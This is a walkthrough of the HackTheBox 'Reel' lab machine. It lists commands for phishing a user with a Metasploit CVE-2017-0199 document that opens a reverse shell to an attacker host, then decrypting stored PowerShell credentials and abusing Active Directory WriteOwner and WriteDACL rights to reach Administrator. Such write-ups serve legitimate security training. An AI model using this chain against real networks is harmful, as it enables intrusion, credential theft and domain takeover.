We covered HackTheBox Reel machine which is part of pwn with Metasploit track. We demonstrated CVE-2017-0199 that is related to Microsoft Office and performed privilege escalation on Active Directory through different methods including Powershell runas, WriteOwner and WriteDACL over objects. This was part of HackTheBox Reel

Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.

Initial Enumeration

I started with an Nmap scan which revealed open ports like 21 (FTP), 22 (SSH), and 25 (SMTP). The scan also indicated the target was likely a Windows Server 2012 R2 machine.

FTP Exploitation

I logged into the FTP server using anonymous credentials (anonymous/anonymous). I downloaded several files from the “documents” directory.

Metadata Analysis

Using exiftool on one of the downloaded Microsoft Office documents, I found an email address: Nico@megabank.com.

SMTP Enumeration

Knowing there was an SMTP server and having an email address, I decided to enumerate for more valid email addresses. I created a wordlist of potential email addresses based on the discovered domain (megabank.com and real.htb). I used an SMTP user enumeration tool (from pentestmonkey) to verify these email addresses. Several addresses, including Nico@real.htb and admin@real.htb, were confirmed to exist.

Phishing Attack with Metasploit

I decided to use a known vulnerability (CVE-2017-0199) related to Microsoft Office documents. Using Metasploit, I generated a malicious RTF document that, when opened, would execute an HTA payload. This HTA payload was hosted on my machine and designed to establish a reverse shell. I configured the Metasploit module with my IP address and specific ports for the HTA server and the reverse shell listener. I then sent this malicious document as an email attachment to Nico@real.htb using the sendemail command-line tool.

Initial Shell and User Flag

Once Nico opened the attachment, I received a Meterpreter session. I navigated to Nico’s user directory and found the user flag and a file named cred.xml

Credential Extraction

The cred.xml file contained stored PowerShell credentials for a user named “Tom” in a secure format. I used a PowerShell command to import and decrypt these credentials, revealing Tom’s plain-text password.

Pivoting to Tom via SSH

I used Tom’s credentials to log in via SSH. In Tom’s desktop directory, I found a “note” file and BloodHound data, hinting at Active Directory enumeration.

Active Directory Enumeration (Manual Analysis)

I explained that due to updates in BloodHound, the provided CSV files wouldn’t work directly with newer versions. I manually analyzed the CSV data (specifically acls.csv) to find relationships and permissions. I discovered that Tom had WriteOwner rights over an object named “Claire.”

Privilege Escalation (Tom to Claire)

Using PowerView (a PowerShell tool for Active Directory enumeration and exploitation), I leveraged Tom’s WriteOwner permission to change Claire’s password. I then logged in as Claire using the new password.

Privilege Escalation (Claire to Backup Admins)

Analyzing the CSV data again, I found that Claire had WriteDACL permissions over the “Backup Admins” group. I used this permission to add Claire to the “Backup Admins” group.

Final Privilege Escalation (Backup Admins to Administrator)

After logging out and back in as Claire (to update group memberships), I confirmed Claire was part of “Backup Admins.” I found that the “Backup Admins” group had full control over the Administrator’s directory. Inside a backup script (backup_script.ps1) located in a “backup_scripts” folder, I found the plain-text password for the Administrator account.

Root Flag

I used the Administrator’s password to SSH into the machine as Administrator and retrieved the root flag.

Technical Commands

  • ftp <IP>
  • anonymous (as FTP username)
  • anonymous (as FTP password)
  • dir
  • cd documents
  • mget *
  • exit (from FTP)
  • cd real
  • exiftool <filename>
  • telnet <IP> 25
  • helo Nico@megabank.com
  • mail from: Nico@megabank.com
  • quit (from telnet)
  • nano maillist
  • smtp-user-enum.pl -M RCPT -U maillist -t <IP>
  • msfconsole
  • search office
  • use exploit/windows/fileformat/office_word_hta
  • options
  • set FILENAME invoice.doc
  • ifconfig
  • set SRVHOST <attacker_IP>
  • set SRVPORT 8080
  • set LHOST <attacker_IP>
  • set LPORT 4445
  • run
  • sendemail -f myname@example.com -t Nico@real.htb -u "Invoice Attached" -m "You are overdue for payment" -a /path/to/invoice.doc -s <target_IP>
  • sessions
  • sessions -i 1
  • pwd (within meterpreter)
  • shell (within meterpreter)
  • cd c:\users
  • dir (within Windows shell)
  • whoami
  • cd Nico
  • cd Desktop
  • type user.txt
  • type cred.xml
  • powershell -C "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential().Password"
  • ssh Tom@<target_IP>
  • cd Desktop
  • cd "Active Directory Audit"
  • type note.txt
  • powershell
  • . .\PowerView.ps1
  • Set-DomainObjectOwner -Identity Claire -OwnerIdentity Tom
  • Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword
  • $pwd = ConvertTo-SecureString "P@$$WOrd123!" -AsPlainText -Force
  • Set-DomainUserPassword -Identity Claire -AccountPassword $pwd
  • exit (from Tom’s SSH session)
  • ssh Claire@<target_IP>
  • Add-NetGroupUser -UserName Claire -GroupName "Backup Admins"
  • net group "Backup Admins"
  • exit (from Claire’s SSH session)
  • ssh Claire@<target_IP> (logging back in)
  • net group "Backup Admins"
  • icacls C:\Users\Administrator
  • cd C:\Users\Administrator\Desktop
  • type root.txt
  • cd ..\backup_scripts
  • type backup_script.ps1
  • ssh Administrator@<target_IP>
  • cd Desktop
  • type root.txt

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles